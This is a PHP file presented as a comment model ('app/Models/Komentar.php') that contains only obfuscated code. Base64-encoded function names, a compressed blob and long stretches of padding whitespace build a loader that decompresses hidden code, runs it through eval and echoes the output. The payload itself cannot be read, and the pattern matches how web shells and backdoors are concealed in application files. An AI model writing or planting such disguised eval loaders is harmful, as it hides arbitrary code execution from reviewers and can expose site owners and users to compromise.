<?php 
        $__='printf';$_='Loading app/Models/Komentar.php';
        































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






























































































































































































                                                                                                                                                                                                                     $________;
